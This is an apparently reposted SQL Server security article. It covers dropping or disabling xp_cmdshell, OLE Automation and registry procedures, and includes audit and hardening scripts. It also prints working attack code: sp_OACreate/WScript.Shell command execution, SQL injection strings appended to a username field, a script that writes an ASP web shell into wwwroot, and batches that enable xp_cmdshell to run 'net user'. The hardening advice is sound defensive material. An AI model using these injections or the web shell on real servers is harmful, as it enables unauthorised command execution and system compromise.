Dangerous SQL Server!

Source: Internet
Author: User

Be careful with stored procedures, and especially with which accounts are allowed to call extended stored procedures. In practice most applications use very few system stored procedures; SQL Server ships so many of them only to cover every possible user need. Delete the ones you do not need, because some system stored procedures can easily be exploited to escalate privileges or to cause damage. If you do not need the extended stored procedure xp_cmdshell, remove it with this SQL statement:

use master
sp_dropextendedproc 'xp_cmdshell'

xp_cmdshell is the easiest way from the database into the operating system; it is the biggest backdoor the database leaves open to the OS. If you need this stored procedure later, restore it with this statement:

sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

If you do not need the OLE Automation stored procedures, drop them as well (this may make some features of Enterprise Manager unavailable). These procedures are:

sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop

Remove any registry-access stored procedures you do not need. The registry stored procedures can even be used to read the operating system administrator's password. They are:

xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite

There are other extended stored procedures you should review as well. Before removing any stored procedure, check what depends on it so that you do not break the database or the application.
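Before dropping or disabling anything it helps to know what the instance actually exposes, and to whom. The audit script below is an added example and is not part of the original article; it assumes SQL Server 2005 or later, where the server options are visible in sys.configurations and explicit grants on the procedures in master are visible in sys.database_permissions. It changes nothing, so it is safe to run first.

```sql
-- Added audit example (not from the original article). Assumes SQL Server 2005 or later.
-- Run as a member of sysadmin; the script only reads catalog views and changes nothing.
USE master;
GO

-- 1. Which of the OS-access options discussed in the article are currently enabled?
SELECT name,
       value_in_use,
       CASE WHEN value_in_use = 1 THEN 'ENABLED - review' ELSE 'disabled' END AS status
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- 2. Who holds an explicit EXECUTE permission on the dangerous procedures?
--    By default none of them is granted to anyone, so every row here is a finding.
SELECT OBJECT_NAME(p.major_id) AS procedure_name,
       dp.name                 AS grantee,
       dp.type_desc            AS grantee_type,
       p.permission_name,
       p.state_desc             -- GRANT or DENY
FROM sys.database_permissions AS p
JOIN sys.database_principals  AS dp ON dp.principal_id = p.grantee_principal_id
WHERE p.class = 1               -- object-level permission
  AND OBJECT_NAME(p.major_id) IN (
        'xp_cmdshell',
        'sp_OACreate', 'sp_OADestroy', 'sp_OAGetErrorInfo', 'sp_OAGetProperty',
        'sp_OAMethod', 'sp_OASetProperty', 'sp_OAStop',
        'xp_regaddmultistring', 'xp_regdeletekey', 'xp_regdeletevalue',
        'xp_regenumvalues', 'xp_regread', 'xp_regremovemultistring', 'xp_regwrite')
ORDER BY procedure_name, grantee;

-- 3. Which logins are members of sysadmin?  A sysadmin reaches every procedure above
--    regardless of grants, so an application login in this list is the first thing to fix.
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE sp.type IN ('S', 'U', 'G')                    -- SQL login, Windows login, Windows group
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
ORDER BY sp.name;
```

The third result set matters most: an application login that is a member of sysadmin turns any SQL injection in that application into the operating-system access the rest of this article describes, whatever the state of the individual procedures.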


sp_OACreate: can run cmd and return its output. It requires the WScript.Shell and Scripting.FileSystemObject COM objects to be available on the server.

sp_OACreate
Creates an instance of an OLE object on an instance of Microsoft SQL Server.
Syntax
sp_OACreate progid | clsid, objecttoken OUTPUT [, context]
---------------------------------------------------------------------
sp_OAGetProperty
Gets a property value of an OLE object.
Syntax
sp_OAGetProperty objecttoken, propertyname [, propertyvalue OUTPUT] [, index...]
---------------------------------------------------------------------
sp_OAMethod
Calls a method of an OLE object.
Syntax
sp_OAMethod objecttoken, methodname [, returnvalue OUTPUT] [, [@parametername =] parameter [OUTPUT]] [, ...n]
---------------------------------------------------------------------
Idea:
First create a WScript.Shell object on the SQL Server and call its Run method so that the output of cmd.exe is redirected into a file. Then create a Scripting.FileSystemObject, use it to open the temporary file (which returns a TextStream object), read the file line by line, and insert each line as a row into a temporary table.
The corresponding SQL statements:

create table mytmp (info varchar(400), id int identity(1, 1) not null)
declare @shell int
declare @fso int
declare @file int
declare @isend bit
declare @out varchar(400)
exec sp_OACreate 'WScript.Shell', @shell output
exec sp_OAMethod @shell, 'run', null, 'cmd.exe /c dir C:\ > C:\temp.txt', '0', 'true'
-- Note: the Run parameter true means "wait until the program has finished". It is required for long-running commands such as ping; otherwise the file is read before the command has written it.

exec sp_OACreate 'Scripting.FileSystemObject', @fso output
exec sp_OAMethod @fso, 'opentextfile', @file out, 'c:\temp.txt'
-- Because the FSO OpenTextFile method returns a TextStream object, @file is an object token.

while @shell > 0
begin
exec sp_OAMethod @file, 'readline', @out out
insert into mytmp (info) values (@out)
exec sp_OAGetProperty @file, 'endofstream', @isend out
if @isend = 1 break
else continue
end

select info from mytmp order by id
drop table mytmp

Note:
If you use this method during an injection test, the statements cannot contain line breaks; you must combine them into a single line with a space between statements.
-------------------------------------------------------------------------------------------------------------------
(1) This example creates an instance of Notepad using the 'WScript.Shell' object:
-- WScript.Shell example
declare @o int
exec sp_OACreate 'WScript.Shell', @o out
exec sp_OAMethod @o, 'run', null, 'notepad.exe'
It can be executed by appending it to the user name:
Username: '; declare @o int exec sp_OACreate 'WScript.Shell', @o out exec sp_OAMethod @o, 'run', null, 'notepad.exe' --

(2) This example uses the 'Scripting.FileSystemObject' object to read a known text file:
-- Scripting.FileSystemObject example: read a known file
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_OACreate 'Scripting.FileSystemObject', @o out
exec sp_OAMethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_OAMethod @f, 'readline', @line out
while (@ret = 0)
begin
print @line
exec @ret = sp_OAMethod @f, 'readline', @line out
end

(3) This example creates a file that executes any command submitted to it:
-- Scripting.FileSystemObject example: create a 'run this' .asp file
declare @o int, @f int, @t int, @ret int
exec sp_OACreate 'Scripting.FileSystemObject', @o out
exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_OAMethod @f, 'writeline', null, '<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd")) %>'
Note that on a Windows NT4 + IIS4 platform, commands run through this page execute with SYSTEM privileges; on IIS5 they run under the lower-privileged IWAM_xxx account.

(4) This example shows how widely this technique applies: it uses the 'Speech.VoiceText' object to make the SQL Server speak:
declare @o int, @ret int
exec sp_OACreate 'Speech.VoiceText', @o out
exec sp_OAMethod @o, 'register', null, 'foo', 'bar'
exec sp_OASetProperty @o, 'speed', 150
exec sp_OAMethod @o, 'speak', null, 'All your sequel servers are belong to us', 528
waitfor delay '00:00:05'
In our hypothetical example it can be executed after the user name (note that this example not only injects a script but also logs on to the application with admin privileges):
Username: admin'; declare @o int, @ret int exec sp_OACreate 'Speech.VoiceText', @o out exec sp_OAMethod @o, 'register', null, 'foo', 'bar' exec sp_OASetProperty @o, 'speed', 150 exec sp_OAMethod @o, 'speak', null, 'All your sequel servers are belong to us', 528 waitfor delay '00:00:05' --

I (lslxdx) have collected the statements needed to run xp_cmdshell and sp_OAMethod; they should be useful to everyone (the statements below are not risky):

 

-- Enable OLE Automation --
exec sp_configure 'show advanced options', 1;
go
reconfigure;
go
exec sp_configure 'Ole Automation Procedures', 1;
go
reconfigure;
go

-- Run sp_OAMethod --
declare @shell int
declare @fso int
declare @file int
declare @isend bit
declare @out varchar(400)
exec sp_OACreate 'WScript.Shell', @shell output
exec sp_OAMethod @shell, 'run', null, 'cmd.exe /c net user', '0', 'true'
go

-- Disable OLE Automation again when done --
exec sp_configure 'show advanced options', 1;
go
reconfigure;
go
exec sp_configure 'Ole Automation Procedures', 0;
go
reconfigure;
go

-- Enable xp_cmdshell --
exec sp_configure 'show advanced options', 1;
go
reconfigure;
go
exec sp_configure 'xp_cmdshell', 1;
go
reconfigure;
go

-- Use a DOS command to list all user accounts on the computer --
exec xp_cmdshell 'net user'
go

-- Disable xp_cmdshell again when done --
exec sp_configure 'show advanced options', 1;
go
reconfigure;
go
exec sp_configure 'xp_cmdshell', 0;
go
reconfigure;
go
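On SQL Server 2005 and later, sp_configure (as in the listing above) rather than sp_dropextendedproc is the supported way to take xp_cmdshell and the sp_OA* procedures out of the attack surface, and it is worth verifying the result instead of assuming the "close" batches ran. The script below is an added example, not part of the author's listing; it turns both options off in one batch and then checks sys.configurations, raising an error if either is still on.

```sql
-- Added hardening example (not from the original article). Assumes SQL Server 2005+,
-- where xp_cmdshell and the OLE Automation procedures are controlled by sp_configure.
USE master;
GO

-- Turn both OS-access features off. 'show advanced options' must be on to change them,
-- so it is enabled first and both changes are applied with one RECONFIGURE.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
GO

-- Verify the running values rather than trusting the previous batch.
DECLARE @still_on nvarchar(200);
SELECT @still_on = STUFF((SELECT N', ' + name
                          FROM sys.configurations
                          WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures')
                            AND value_in_use = 1
                          FOR XML PATH('')), 1, 2, N'');
IF @still_on IS NOT NULL
    RAISERROR(N'OS-access feature(s) still enabled: %s', 16, 1, @still_on);
ELSE
    PRINT N'xp_cmdshell and Ole Automation Procedures are disabled.';
GO
```

Keep in mind that any member of sysadmin can turn these options back on with the same three sp_configure calls, so the setting is only as strong as the sysadmin membership list; disabling the features removes them from a low-privileged or injected context, not from an attacker who already holds sysadmin.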
